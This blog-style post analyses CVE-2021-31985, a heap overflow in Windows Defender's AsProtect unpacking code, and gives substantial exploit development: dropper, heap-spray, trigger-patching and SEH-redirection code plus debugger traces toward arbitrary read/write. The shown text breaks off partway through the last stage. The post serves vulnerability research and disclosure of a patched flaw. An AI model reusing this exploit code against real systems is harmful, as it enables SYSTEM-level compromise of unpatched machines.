CVE-2021-31985: Exploiting the Windows Defender AsProtect Heap Overflow Vulnerability



Overview

In the security updates of June 2021, Microsoft patched a heap buffer overflow in the Windows Defender mpengine.dll assigned as CVE-2021-31985. The vulnerability was found by Google Project Zero (GP0) and reported on May 25, 2021.

The Windows Defender Antivirus scans packed binaries by emulating them in its virtual machine, the Defender Emulator, and takes over the unpacking when certain signatures are detected. One of these is AsProtect. To execute AsProtect packer bytecode, it has to reconstruct an embedded VM DLL supplied by this "external" packed binary. A lack of sanitization on the sections relative-virtual-address (RVA) allows a memcpy-style heap overflow with controllable data, size and offset. These primitives could lead to remote code execution as NT Authority\SYSTEM privileges.

In this blog post, first we recap the root-cause analysis of this vulnerability from the original GP0 issue tracker[1]. Next we discuss how CVE-2021-31985 can be exploited based on the in-the-wild (ITW) sample of CVE-2021-1647. Finally we end this blog post with a parting remark on how a change in an object layout from mpengine.dll 1.1.18100 onwards breaks the exploitation technique used here.

The reader is assumed to be familiar with the Windows Defender Emulator internals. Otherwise this presentation[2] and tool[3] are excellent resources.

This exploit was developed on Windows Defender mpengine.dll 1.1.16400.2, a symbolized version default on Windows x64 20H2 (19042.508).



Vulnerability

From the original GP0 issue tracker[1], the vulnerable function is in CEmbededDLLDumper::GenerateDLL(). In this function, the embedded VM DLL is reconstructed from the first parameter CEmbededDLLDumper *dll_dumper, which is a pointer to section descriptors, header information and section raw streams to be copied. In a nutshell, the function executes the following sequence of actions:

  1. Allocates memory for the entire PE image
  2. Copies a fixed PE header embedded in mpengine.dll
  3. Initializes various fields in NtHdr->OptionalHeader
  4. Creates section header entries
  5. Copies section raw data to PE image
  6. Calls VirtualFileWrapper::Write() to dump this constructed VM DLL to Emulator Virtual-FileSystem (VFS)

The vulnerability exists as the RVA offset in the image buffer is used to compute the destination address for the memcpy_s_0() call without checks.

In [1], the last section RVA is set to 0x41414141 to trigger an immediate OOBW. However, since the image buffer is user-supplied, the number of sections, size, RVA of sections and section raw data are all controllable. This gives us a nice write-what-where primitive for exploitation.

Based on the attachments in [1], triggering the vulnerability is straightforward. File asprotect-v1.23RC1-unmodified-sample.bin is a benign binary packed by AsProtect-v1.23RC1. File asparse.c patches the RVA of last section in embedded VM DLL to 0x41414141. File asprotect-patched-segment-rva.bin triggers the vulnerability.

In asparse.c, the following lines are used to indicate the offset and size for embedded VM DLL:


static unsigned kEmbeddedDllSize = 0x11c1e;
static unsigned kEmbeddedDllOffset = 0x42ce9;
static unsigned kNewRva = 0x41414141;

At offset kEmbeddedDllOffset, 8 bytes are used to compute a RC4 key with its MD5 hash. Then kEmbeddedDllSize bytes of raw data stream are RC4-decrypted with this key. In this RC4-decrypted data stream, the VM DLL information can be located at offset 0x9401, following a 4-byte signature AF B8 7A 2E. During emulation, this signature is computed in runtime to locate the start of VM DLL. In short, starting from offset 0x9401 - 0x4 = 0x93FD, the corresponding embedded VM DLL will look like this:


AF B8 7A 2E                  // Signature for VM DLL
50 7C 00 00                  // Image Data Size 0x7C50
00 00 00 00 00 00 00 00      //
98 40 00 00                  // EntryPoint
00 00 40 00                  // Image Base 0x400000
00 D0 00 00                  // Image Virtual Size 0xD000
00 B0 00 00                  // .data section RVA
00 A0 00 00                  // .idata section RVA (IAT)

00 10 00 00                  // .text section RVA
00 34 00 00                  // .text section Virtual Size
FF 25 E4 A0 40 00 8B C0 ...  // .text section raw data

Following the AF B8 7A 2E signature are 0x20 bytes of DLL fields that CEmbededDLLDumper::DumpEmbededDLL() parses and checks. Then the function loops to process tuples of (sect_rva, sect_size, raw_data_stream) data for each section for 0x7C50 bytes of image data.

Therefore to minimize our POC code, we limit the number of sections to just the .text section, changed all corresponding related bytes (eg: section RVA, section size, image size, etc) and also modify the kNewRva variable.



Exploitation

The exploitation outline for CVE-2021-31985 is based on the technique used in CVE-2021-1647 because of their similarities. In our study of CVE-2021-1647 ITW sample[4] (SampleITW_1647), public analyses from ThreatBook[5] and GP0[6] shed important insights for us to understand its exploitation workings, in particular "primitive bootstrapping". The reader is strongly encouraged to read these. The key points are noted below:

  1. Use of NtControlChannel() to obtain mpengine.dll version.
  2. Use of SuspendThread() and ResumeThread() to perform heap spray and manipulate memory layout.
  3. Trigger heap overflow to overwrite an lfind_switch_payload object with hardcoded values 0x2F9B and 0x2F9C (aka OOBW1).
  4. Values 0x2F9B and 0x2F9C are later used as indices in lfind_switch::switch_in() to perform OR 0x3 operation to 2 bytes of a size field in the VMM_context_t structure. This changes the original 0xC value to 0x3030C (aka OOBW2). As this size field tracks virtually mapped pages in a table, this effectively allows us arbitrary R/W via the EmuVaddrNode index array.
  5. Use of emulated execution and Defender VM JIT for code execution.

During our course of development, we found and referenced another useful public sample of CVE-2021-1647 [7] (SamplePUB_1647). To shorten development time, we decided to reuse as much of its artefacts as possible.

The exploitation strategy is discussed below. In this section, POC.exe refers to our own build of CVE-2021-31985.

1. Preparation

The POC.exe will drop dump.exe (from SamplePUB_1647) to Emulator VFS, of which a stage-2 binary is already built into it. Therefore in this stage, we replace this original embedded binary with our custom stage2.exe by overwriting its size and content at offsets 0xA894 and 0xA8A0 respectively.

Next, as POC.exe will create multiple instances of dump.exe, a global event is also created for processes synchronization.


#include "dump_exe.h"
#include "stage2.h"

int wmain() {
    HANDLE hEvent;
    SECURITY_ATTRIBUTES securityAttributes;
    // ...
    // replace stage2 embedded in dump.exe, max 0x10000 bytes
    *(DWORD*)&dump_exe[0xA894] = stage2_exe_len;
    memset(&dump_exe[0xA8A0], 0, 0x2064);
    for (i = 0; i < (int)stage2_exe_len; i ++)
        dump_exe[0xA8A0 + i] = stage2_exe[i] ^ 0xDE;
    drop_file(L"dump.exe", dump_exe, dump_exe_len);
    
    securityAttributes.nLength = 12;
    securityAttributes.lpSecurityDescriptor = 0;
    securityAttributes.bInheritHandle = 1;        // dump.exe inherits hEvent
    hEvent = CreateEventW(&securityAttributes, 0, 0, 0);
    // ...
}
2. Heap Spray

In this step, POC.exe will create 2 instances of dump.exe, with argument 1 and 3 respectively. These will in turn create more instances of dump.exe, with argument 2.1, 2.3 and 2.1. The aim of these instances is to each spray the memory with 250 lfind_switch objects and wait on the global event. Finally 25% of these objects are freed to create the 'holes' for the subsequent (step 6) arbitrary OOBW2.

The heap spray is done with a combination of CreateThread(), ResumeThread(), SuspendThread() and TerminateThread() function calls. The spray objects are allocated in lfind_switch::switch_out(), and reused in lfind_switch::switch_in(). The relevant functions are:


void NTDLL_DLL_NtCreateThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtResumeThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtSuspendThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtTerminateThreadWorker(struct pe_vars_t *pe_vars);

These functions are related to the lfind_switch class object through the following example call stack.


NTDLL_DLL_NtSuspendThreadWorker(struct pe_vars_t *a1)   // or ResumeThread()
-> adjustSuspensionThreadWorker(pe_vars, 1, -1)         // -1, 0 for ResumeThread()
   -> ThreadManager::performThreadSwitchToThread()
      -> pe_switch_CTX_ForThread()
         -> pe_switch_CTX_base()
            -> lfind_switch::switch_out()               // or ::switch_init() or ::switch_in()

The sprayed object, lfind_switch_payload, is pointed by the lfind_switch object. We guess that this object is used to store (intermediate) states related to context of current thread.

In lfind_switch::init(), which is called by NtCreateThreadWorker(), we observed that the lfind_switch_payload object is allocated 0x100 bytes. In SamplePUB_1647 and POC.exe, we uses the following sequence to reallocate and increase this spray object size from 0x100 bytes to 0x2000 bytes:


// POC.exe spray code, dump.exe has a similar sequence
for ( i = 0; i <= 249; ++i )         // CREATE_SUSPENDED = 4
    threadPool[i] = CreateThread(0, 0, SprayRoutine, 0, 4, &dwThreadId);
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 1st SuspendThread()
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 2nd SuspendThread()
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 3rd SuspendThread()

Next, we set the thread routine to SprayRoutine() defined as below:


DWORD __stdcall SprayRoutine(LPVOID lpThreadParameter) {
    SuspendThread(GetCurrentThread());
    SuspendThread(GetCurrentThread());
    SuspendThread(GetCurrentThread());
}

On the third SuspendThread(), lfind_switch::switch_out() will be called and subseqeuntly, the lfind_switch_payload object will be reallocated to 0x2000 bytes, presumbly to store the thread state before the context switch. The repeated SuspendThread() calls is intentional to force the storage of more intermediate states. Our reversing suggests this is related to BBinfo_LF::get_loop_info(). Removing or adding any number of SuspendThread() will affect the object reallocated size.

3. Construction of AsProtect Trigger

Although the original asprotect-patched-segment-rva.bin triggers the AsProtect bug, it allocates an PE image buffer of 0xD000 bytes. However, if we were to reuse the technique of CVE-2021-1647, we have to modify this blob so that it allocates a PE image buffer of 0x2000 bytes instead. Therefore, we modify asparse2.c to the following:


    // asparse2.c: modifications to the original asparse.c
    // additions, at offsets right after sig_x 0x9401 in seg->buf
    static unsigned kOffsetSigX = 0x9401;	// offset after AF B8 7A 2E in RC4 stream
    
    static unsigned kNewDataSize = 0x1024;	// was 0x7c50, 0x3423 for .text, now reduced
    static unsigned kNewImgSize = 0x2000;	// was 0xd000 => lfind_switch_obj size
    static unsigned kNewSect0Size = 0x1000 - 0x10;	// was 0x3400 => memcpy_s OOBW1 size
    static unsigned kNewSect0RVA = 0x2000 + 0x10;	// was 0x1000 => OOBW1 offset
    static unsigned kNewSect4RVA = 0x0;		// was 0xb000 => to pass checks
    static unsigned kNewIAT_RVA = 0x0040;	// was 0xa000 => control content if needed
    static unsigned kNewEntPoint = 0x009C;	// was 0x4098 => in image, semi-controlled
    
    uint8_t sect0_buf[0x1000] = { 0 };
    
    int main(int argc, char **argv)
    {
        // ...
        uint16_t OOB_Idx2 = 0;
        // ...
        // The first 8 bytes need to be hashed to generate the RC4 key.
        // 01 00 00 00 26 1c 01 00 (size 0x011c26 - 8) untouched
        MD5(seg->key, sizeof seg->key, md);
        
        // ... after decrypting the RC4 encrypted embedded file ..
        
        // offsets: 0 DataSize, 0xC EntryPoint RVA, 0x14 ImgSize, 0x18 B000, 
        //          0x1C A000, 0x20 .sect0 RVA 1000, 0x24 .sect0 Size 3400 
        //memcpy(&seg->buf[0x10e49], &kNewRva, sizeof kNewRva);
        memcpy(&seg->buf[kOffsetSigX + 0], &kNewDataSize, sizeof kNewDataSize);
        memcpy(&seg->buf[kOffsetSigX + 0xC], &kNewEntPoint, sizeof kNewEntPoint);
        memcpy(&seg->buf[kOffsetSigX + 0x14], &kNewImgSize, sizeof kNewImgSize);
        memcpy(&seg->buf[kOffsetSigX + 0x18], &kNewSect4RVA, sizeof kNewSect4RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x1C], &kNewIAT_RVA, sizeof kNewIAT_RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x20], &kNewSect0RVA, sizeof kNewSect0RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x24], &kNewSect0Size, sizeof kNewSect0Size);
    
        OOB_Idx2 = 0x2F9A;		// version > 15999
        memset(sect0_buf, '\xff', sizeof(sect0_buf) - 0x10);
        *(uint16_t *)§0_buf[0x10 + 0x30 - 0x10] = 8;
        *(uint16_t *)§0_buf[0x10 + 0x42 - 0x10] = 2;
        *(uint16_t *)§0_buf[0x10 + 0x58 - 0x10] = OOB_Idx2 + 1;		// 0x2f9b for 16000 
        *(uint16_t *)§0_buf[0x10 + 0x5A - 0x10] = OOB_Idx2 + 2;		// 0x2f9c for 16000
        memcpy(&seg->buf[kOffsetSigX + 0x28], sect0_buf, sizeof(sect0_buf));
        
        // ... encrypting the modified embedded file ..
    }

Similar to SamplePUB_1647, we overwrite the 0x63000 bytes section (at offset 0x560000) of the above AsProtect packed binary as the crafted embedded VM DLL to trigger the bug, allocate the 0x2000 bytes image buffer, and set the overwritten data for OOB1. We also identified basic-block (BBL) 0x5BF04D as the AsProtect signature BBL, similar to corresponding BBL 0x426000 in SamplePUB_1647. As simple as this sounds, with no prior experience in Windows Defender, learning to debug this via traces from kvscan4sig() has been "fun" :) Anyway, the relevant breakpoints to reach the unpacked AsProtect signature BBL is shown:


    0:000:x86> bu 402000; g					// go to entry point
    0:000:x86> bu 56025b; g					// go to the relevant decrypt loop
    Breakpoint 1 hit
    trigger+0x16025b:
    0056025b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    
    0:000:x86> bc
    0:000:x86> ba r1 5bf04d; g			 	// the signature block is unpacked
    Breakpoint 1 hit
    trigger+0x16025b:
    0056025b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    
    0:000:x86> bc; p						// finish the unpacking of sig BBL
    0:000:x86> bu 5bf04d; g					// break on hitting the sig BBL
    0:000:x86> g
    Breakpoint 1 hit
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    0:000:x86> r
    eax=00000001 ebx=005aa650 ecx=bea80000 edx=00000000 esi=001c0000 edi=0058c000
    eip=005bf04d esp=007cff1c ebp=0017c6bc iopl=0         nv up ei pl nz ac po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    
    0:000:x86> dd esp						// important values on the stack
    007cff1c  0058c000 001c0000 005600ff 007cff3c
    007cff2c  005aa650 00000000 bea80000 00000001
    007cff3c  005aa650 0058c000 00000001 00000000
    007cff4c  00000000 00560517 00402000 00402000
    
    0:000:x86> u 5bf04d
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    005bf052 03dd            add     ebx,ebp
    005bf054 2b9d71294400    sub     ebx,dword ptr trigger+0x42971 (00442971)[ebp]
    005bf05a 83bdd830440000  cmp     dword ptr trigger+0x430d8 (004430d8)[ebp],0
    005bf061 899d2f2e4400    mov     dword ptr trigger+0x42e2f (00442e2f)[ebp],ebx
    005bf067 0f853e050000    jne     trigger+0x1bf5ab (005bf5ab)
    005bf06d 8d85e0304400    lea     eax,trigger+0x430e0 (004430e0)[ebp]
    005bf073 50              push    eax

At this point, the RC4-encrypted VM DLL is already loaded in memory and the AsProtect signature BBL is unpacked and ready to be executed to unpack, decrypt and dump the VM DLL on VFS as discussed in the next section.

4. Execution of AsProtect Unpacking

As seen below, the function to trigger CVE-2021-31985 is deeper than CVE-2021-1647 in the call stack.


AsProtect signature BBL trigger:
kvscanpage4sig(buf_426000 / buf_5bf04d) 
=> UnpackerContext::Unpack(Unpack *)
    => AsprotectIsMine()
        => CAsProtectDLLAndVersion::RetrieveVersionInfoAndCreateObjects() // CVE-2021-1647
    => CAsprotectUnpacker::Unpack(Unpacker)
        => CAsprotectUnpacker::ReBuild(CAsprotectV2Unpacker* Unpacker)
            => CAsprotectUnpacker::ReBuild_Basic(CAsprotectUnpacker* Unpacker)
                => CAsprotectUnpacker::GetEncryptedData(Unpacker)
                => CAsprotectUnpacker::InitAndDecryptSignatureData(Unpacker)
                => CAsprotectUnpacker::InitSignatures(Unpacker)
                    => CAsprotectV2Unpacker::GetFeaturedSignature(Unpacker)
                            => CAsprotectV2Unpacker::GetSignatureForSignatureTable(Unpacker)
                            => CAsprotectUnpacker::SearchSignature(Unpacker)
                            => CAsprotectV2Unpacker::BuildSignatureTable(Unpacker)
            => CAsprotectV2Unpacker::DumpEmbededDLL(Unpacker)
            => functions handling RebuiltIAT_OEP, Imports, ObfuscatedFunctions, etc
            => CAsprotectV2Unpacker::GenerateSimulator(Unpacker)
                => CEmbededDLLDumper::DumpEmbededDLL(), dumps VM DLL //CVE-2021-31985

This also means that triggering CVE-2021-31985 requires the unpacking execution to satisfy additional checks and constraints. Of particular interest is a 0x40 bytes user-controlled content found at top of stack at AsProtectIsMine(). While we simply reuse this stack content from a normal execution without understanding their semantics, we did came across an Unpacker object that reads in DWORD 0x00560517 from the stack. This is actually an address that contains information to bootstrap locating the VM DLL stream and its section tables. For example, in ReBuild_Basic(), the callee ReadPackedFile() will fetch the image base 0x400000 from 0x560517 and used it to compute for the VM DLL stream address.

Next, the (sub)call tree of CAsprotectUnpacker::InitSignatures() builds a signature table containing different signatures (in BuildSignatureTable()) among which signature sig_x = 0x2E7AB8AF will be used later.

Finally in CAsprotectV2Unpacker::DumpEmbededDLL(), the signature sig_x is used together with an index 0x8E to locate the section tables in the decrypted VM DLL stream, read the data stream size and instantiate the CEmbededDLLDumper *dll_dumper object to be passed as an argument to the vulnerable function CEmbededDLLDumper::GenerateDLL().

The full set of 0x40 bytes stack values are shown below.


#include "sect_560.h"

unsigned char *save_ebp, *save_esp;
unsigned char *_sect_560000 = NULL;

DWORD stack_0x40[] = {
    0x058c000, 0x01c0000, 0x05600ff, 0x07cff3c,			// IAT 0x40 version
    0x05aa650, 0x0000000, 0xbea80000, 0x0000001,		// 0x9C version
    0x05aa650, 0x058c000, 0x0000001, 0x0000000,
    0x0000000, 0x0560517, 0x0402000, 0x0402000
};

int main() {
    // ...
    _sect_560000 = VirtualAlloc((LPVOID)0x560000, 0x63000, 0x3000, 0x40);
    if (_sect_560000 != (unsigned char*) 0x560000)
        return 0;
    memcpy(_sect_560000, _sect_560, _sect_560_len);
    memset(_sect_560000 + 0xa3c, 0, 0xc93 - 0xa3c);
    // ...
    __asm{
        push ecx
        sub esp, 0x40
        mov save_esp, esp
        mov save_ebp, ebp
    };
    memcpy(save_esp, stack_0x40, 0x40);
    __asm{
        mov ebp, 0x17c6bc
        mov esp, save_esp
        mov ecx, _sect_560000
        add ecx, 0x5f04d        // buf_trigger = _sect_560000 + 0x5f04d;
        jmp ecx					// ((void (*)(void))buf_trigger)();
        mov esp, save_esp
        mov ebp, save_ebp
        add esp, 0x40
        pop ecx
    };
}
5. Continuation of AsProtect Trigger

In the previous step, we successfully trigger the AsProtect signature BBL and transit from PE space to the vulnerable code in native space function CEmbededDLLDumper::DumpEmbededDLL(). After the trigger is done, the other half of the problem is to get back to the PE space so POC.exe continues execution to finish the rest of the steps. This depends on the following:

  1. After CEmbededDLLDumper::DumpEmbededDLL() completes OOBW1, it calls VirtualFileWrapper::Write() to dump the embedded VM DLL onto VFS and cause the Emulator to start a scan of this dropped file. For the crafted VM DLL, this scan jeopardizes the dump.exe processes synchronization. We tried setting various Emulator options, including MpSetAttributes("pea_disable_dropper_rescan"), to disable the scan but to no avail. Fortunately we are able to avoid triggering the scan by not writing VM DLL to VFS altogether. This is possible as after OOBW1, the Emulator calls GetImportDescSize() before VirtualFileWrapper::Write(). Since we control VM DLL IAT section, we can cause GetImportDescSize() to fail and therefore, VirtualFileWrapper::Write() is not called, VM DLL is not written to VFS, and scan will not be triggered.

  2. Redirect execution from native mpengine.dll BBL back to PE space emulation of POC.exe by reusing the SEH trick (ie: deliberately cause a BBL emulation fault so that PE space emulation regains control) in SamplePUB_1647. In the sample, a SEH machanism is first set up. Then, immediately after AsProtect signature BBL 0x426000, BBL 0x42655E triggers a call to MpSetAttributes("pea_uses_invalid_opcodes") and causes execution to continue in the (PE space) SEH. Similarly, after our AsProtect signature BBL 0x5BF04D, we call MpSetAttributes("pea_uses_access_violation") and MpSetAttributes("pea_dynmem_uses_access_violation").

To recap, we have now constructed POC.exe that triggers AsProtect unpacking in Emulator --> executes and overwrites with OOBW1 successfullly --> deliberately avoid triggering file scan --> finishes AsProtect signature BBL unpacking --> deliberately causes access violation to continue execution in custom SEH mechanism back in POC.exe. Similarly in SamplePUB_1647, the custom SEH is set up with:

  1. iX_SaveCtx(): Saves 6 registers to a TargetFrame and installs the SEH handler to FS:[0].

  2. iX_LoadCtx(): Restores the context.

  3. iX_seh_handler(): Regains control and reports its mode by setting the return value EAX when context is restore from iX_SaveCtx().


__declspec(naked) int iX_SaveCtx(TargetFrame *TF)
{
    __asm {
        pop edx			// ret
        pop eax			// TF
        mov [eax+0x0C], esi
        mov [eax+0x10], edi
        mov [eax+0x14], ebx
        mov [eax+0x18], edx	// TF[6] = ret
        mov [eax+0x1C], ebp
        mov [eax+0x20], esp

        mov ecx, fs:0		// setup SEH
        mov [eax], ecx
        mov fs:0, eax
        lea ecx, iX_seh_handler
        mov [eax+4], ecx
        push eax
        push eax
        
        call mark_target_frame
        add esp, 4
        pop eax
        mov edx, [eax+0x18]
        xor eax, eax
        jmp edx
    };
}

__declspec(naked) void iX_LoadCtx(TargetFrame *TF, DWORD ret)
{
    __asm {
        add esp, 4
        pop ebx
        pop eax
        mov esi, [ebx+0xC]
        mov edi, [ebx+0x10]
        mov ecx, [ebx+0x14]
        mov edx, [ebx+0x18]
        mov ebp, [ebx+0x1C]
        mov esp, [ebx+0x20]
        mov ebx, ecx
        jmp edx
    };
}

int iX_seh_handler(char *a1, TargetFrame *TF, char *a3, char *a4)
{
    DWORD dw_TF16;
    DWORD bit0_TF15 = TF->dw15 & 1;
    if (bit0_TF15 || TF->mark != 0xDEADBEEF)
        return 1;
    if (TF->dw15 & 2)
        dw_TF16 = TF->dw16;
    if (dw_TF16 >= 0) {
        if (!dw_TF16)
            return 1;
        RtlUnwind(TF, (PVOID)0x401103, 0, 0);	// to replace 0x40A516
        iX_LoadCtx(TF, 2);						// iX_SaveCtx() returns 2
    }
    return 0;
}
6. OOBW2

To this point, we have modified CVE-2021-31985 to have a similar "exploitation flow" as CVE-2021-1647 so we can now also reuse dump.exe for OOBW2.

As mentioned, a number of dump.exe instances are created for heap spraying. In particular, "dump.exe" 1 and "dump.exe" 3 are solely used to spray 250 lfind_switch_payload objects, as each emulator process is limited to 250 threads maximum. However "dump.exe" 2 has a different flow; it has two passes: in the 1st pass, it sprays 250 objects as well, but also creates 55 holes to prepare for the AsProtect trigger.


// "dump.exe" 2 creating holes in its first pass
for ( idx = 0; idx <= 217; idx += 4 )
{
    // pick these threads to resume so they terminate naturally
    ResumeThread_B1001075(*(HANDLE *)(4 * idx - 0x4EFD9260));
    *(_DWORD *)(4 * idx - 0x4EFD9260) = 0;    // Remove the freed threads
}

In the 2nd pass, OOBW1 will have already taken place. The lfind_switch_payload object following the hole reclaimed for the 0x2000 bytes image buffer in OOBW1 gets overwritten with crafted indices (0x2F9B and 0x2F9C) in the AsProtect trigger. The overwritten object belongs to the "dump.exe" 2 instance. Hence resuming its associated thread will cause lfind_switch::switch_in() to be called and the corrupted states (and indices) to be used.


// "dump.exe" 2 triggering OOBW2 in its second pass
for ( idx = 0; idx <= 249; ++idx )
{
    // this loop will clear the extra SuspendThread to call switch_in()
    if ( *(_DWORD *)(4 * idx - 0x4EFD9260) )
    ResumeThread_B1001075(*(HANDLE *)(4 * idx - 0x4EFD9260));
}

Then ResumeThread() calls switch_in(), which makes use of the two indices to write 0x03 to two bytes out-of-bound, changing the DWORD from 0xC to 0x03030C. This value describes the number of entries in an index array EmuNodeIndex_list[] for searching page table entries that map PE space addresses (x86) to native mpengine.dll addresses (x64). Therefore modifying it to a large value of 0x03030C enables further capabilities to manipulate the page tables, leading to OOBW3.


char lfind_switch::switch_in(lfind_switch *lfind_switch_obj, struct BBinfo_LF *pBBinfo_LF)
{
    lfind_switch_payload = *(_QWORD *)lfind_switch_obj;
    // ...
    // restore thread "context" from lfind_switch_payload, use 0x0008
    *((_WORD *)pBBinfo_LF + 0x172) = *(_WORD *)(lfind_switch_payload + 0x30);
    // to copy 0x0002 * 2 = 0x0004 bytes for the two indices
    v15 = 2 * *(unsigned __int16 *)(lfind_switch_payload + 0x42);
    if (v15) {
        memcpy_s_0(
            **((void *const **)pBBinfo_LF + 0x5D),  // dst for copied indices
            v15,                                    // copy 4 bytes
            // src for indices: 9b 2f 9c 2f
            (const void *const)(v12 + *(_QWORD *)lfind_switch_obj + 0x48i64),
            v15);
        for ( indices_base = *((_QWORD *)pBBinfo_LF + 0x14);
            (unsigned int)i_1 < *(_DWORD *)(bb_obj_5D + 0x78);
            *(_BYTE *)(idx_A + *(_QWORD *)(bb_obj_5D + 0x90)) |= 3u )// OOBW2
        {
            i_2 = (unsigned int)i_1;
            i_1 = (unsigned int)(i_1 + 1);
            // fetch from the indices array (copied previously above)
            idx_A = *(unsigned __int16 *)(*(_QWORD *)bb_obj_5D + 2 * i_2);
            *(_WORD *)(indices_base + 2 * idx_A) |= 0x100u;
        }
    }
}

We note here that while the indices 0x2F9B and 0x2F9C are valid for mpengine.dll 1.1.16000 to 1.1.16400, the corresponding indices to modify 0xC to 0x03030C (ie: OOBW2) in mpengine.dll 1.1.18100 are 0x3071 and 0x3072 instead.

7. OOBW3

As described by [6], SampleITW_1647 contains a sequence of OOBW primitives chained together for "primitive bootstrapping". We name the last group of primitives as OOBW3 collectively, though they are in fact building up towards arbitrary R/W and code execution. Similar to section OOBW2, OOBW3 is implemented by reusing dump.exe, specifically the 2nd pass of "dump.exe" 2. Our understanding of OOBW3 benefited greatly from the concise and accurate hints by [5].

The related key functions are as follows:

  1. char PEVAMap::Reserve(PEVAMap *this, QWORD lpAddr, QWORD lpAddrEnd, DWORD flProtect, DWORD a5);
  2. char PEVAMap::Commit(PEVAMap *this, QWORD lpAddr, QWORD lpAddrEnd, DWORD flProtect);
  3. QWORD VMM_context_t>::insert_new_page(VMM_x32_context *vmm_x32_ctx, int dwEmuPageNum, DWORD flEmuProtect);

Each process has a vmm_x32_ctx object that tracks memory related states and objects. The relevant fields are:


// 1: kd> dq 000002471a9ed4b8+e*8 l1
// 00000247`1a9ed528  00000247`1a9f61f0
vmm_x32_ctx->EmuVaddrNode_list;		// QWORD 0xE, list of EmuVaddrNode objects
    
// 1: kd> dq 000002471a9ed4b8+10*8 l1
// 00000247`1a9ed538  00000247`1a9f40a0
// 1: kd> dw 00000247`1a9f40a0
// 00000247`1a9f40a0  0000 0001 0032 0052 0053 005a 0068 008b
// 00000247`1a9f40b0  0090 0091 00a3 00a4 00a3 00a4 00a3 00a4
// 00000247`1a9f40c0  00a3 00a4 00a3 00a4 00a3 00a4 00a3 00a4
vmm_x32_ctx->EmuNodeIndex_list;// QWORD 0x10, list of indices to nodes above

vmm_x32_ctx->EmuNodeIndex_size;// DWORD 0x644, now 0x3030C, size of index list

A 0x18 bytes object EmuVaddrNode is used to describe the page mapping between a PE space address to the native Emulator address. For example, at the start of "dump.exe" 2, a work buffer at 0x70000000 is allocated as: buf_ptr = pfVirtualAlloc(0x70000000, 0x20000, 0x3000, PAGE_READWRITE); here the page number is 0x70000 and has an index 0x32 in the node list. The resulted object can be found from the node array as below:


// after alloc 0x20000 at [0x70000000,0x70020000), index 0x32 (end 0x52):
// 1: kd> dc 00000247`1a9f61f0+18*32 l6
// 00000247`1a9f66a0  1aa41180 00000247 00070000 0000803f
// 00000247`1a9f66b0  0444801b 0000ffff
struct EmuVaddrNode {
    PVOID Vaddr = 0x2471aa41180;
    DWORD EmuPageNum = 0x70000;
    DWORD EmuProtect = 0x803F;
    // ... other 0x8 bytes
}

The index array EmuNodeIndex_list[] provides a quick way to manipulate the EmuVaddrNode object entries. A new memory allocation is serviced by insert_new_page(), which uses a quick search algorithm to locate a suitable pivot point in EmuVaddrNodeIndex_list[], insert the page index, possibly shifting or changing neighboring indices, inserting or modifying nodes in EmuVaddrNode_list[] array, and finally update the current number of index array entries, vmm_x32_ctx->EmuNodeIndex_size.

At the start of 2nd pass of "dump.exe" 2, the size of the index list is overwritten to 0x3030C. This gives an attacker the capability to "operate" on a virtually extended, very large index array. In fact at this point, index pair [0x0, 0x1) is for the page 0x40000 and [0x32, 0x52), the two native Vaddr values differ by (0x32 - 0x0) << 12 = 0x32000 bytes. And the following constant offsets can be observed:


vmm_x32_ctx->EmuVaddrNode_list - vmm_x32_ctx->EmuNodeIndex_list = 0x2150;
EmuVaddrNode_idx0.Vaddr - vmm_x32_ctx->EmuNodeIndex_list = 0x1B0E0;
EmuVaddrNode_idx0.Vaddr - vmm_x32_ctx->EmuVaddrNode_list = 0x18F90;

Hence the address of page 0x700000 being EmuVaddrNode_idx32.Vaddr is 0x1B0E0 + 0x32000 = 0x4D0E0 bytes away from EmuNodeIndex_list[], and is reachable from a corrupted (WORD-size) index array of size 0x3030C. In the 2nd pass of "dump.exe" 2, the 0x20000 bytes at 0x70000000 is used as a work buffer to construct fake indices and fake EmuVaddrNode object to achieve OOBW3.

The collective OOBW3 consists of 5 smaller steps OP1 to OP5, followed by the final step of constructing a fakeEmuVaddrNode object to achieve arbitrary R/W and code execution. Each OP_* step is a delicate sequence of crafting fake indices in the work buffer, invoking one or more insert_new_page() to manipulate the state-crafted index array, and achieving some previously unintended capability. At the core of OP_* construction is the function get_pivot_B1009CE0(int numEntries_0x303xx, int bUpdatePivot), which computes the current pivot position in the work buffer according to the numEntries value, from 0x3030C at OP1, to 0x30316 at OP5. As insert_new_page() uses a quick search algorithm to operate on the index array, get_pivot() is concisely implemented by a mathematical characterization of the algorithm in various conditions.

Steps OP1 to OP2 leak the EmuVaddrNode object for page 0xFFD00 into the work buffer at 0x70001000. This is further used to derive the Vaddr of index 0x0, leaked_idx0_base, establishing the mapping between PE space address and native space address for later steps. The simplified pseudo-code is as follow:


===========
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a3
// 00000247`1aa546b6  00a4 0001 0001 0001 0001 0001 0001 0001
// [+] PEVAMap::Reserve(lpAddr fb010000, lpEnd fb020000, flProt 4)
buf_ptr = pfVirtualAlloc(0xFB010000, 0x10000, 0x2000, PAGE_READWRITE);
// OP1.1: COMMIT 0xFB010: [a0,a1) inserted at pivot[-1,0]
buf_ptr = pfVirtualAlloc(0xFB010000, 0x1000, 0x1000, PAGE_READWRITE);
// 1: kd> dw 000002471aa41180+13536-10 l10
// 00000247`1aa546a6  0001 0001 0001 0001 0001 0001 0091 00a0
